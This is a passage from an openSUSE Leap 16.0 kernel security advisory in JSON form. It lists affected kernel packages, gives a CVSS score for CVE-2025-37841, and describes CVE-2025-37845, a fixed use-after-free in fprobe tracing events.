"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-37841"
},
{
"cve": "CVE-2025-37845",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37845"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: fprobe events: Fix possible UAF on modules\n\nCommit ac91052f0ae5 (\"tracing: tprobe-events: Fix leakage of module\nrefcount\") moved try_module_get() from __find_tracepoint_module_cb()\nto find_tracepoint() caller, but that introduced a possible UAF\nbecause the module can be unloaded before try_module_get(). In this\ncase, the module object should be freed too. Thus, try_module_get()\ndoes not only fail but may access to the freed object.\n\nTo avoid that, try_module_get() in __find_tracepoint_module_cb()\nagain.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
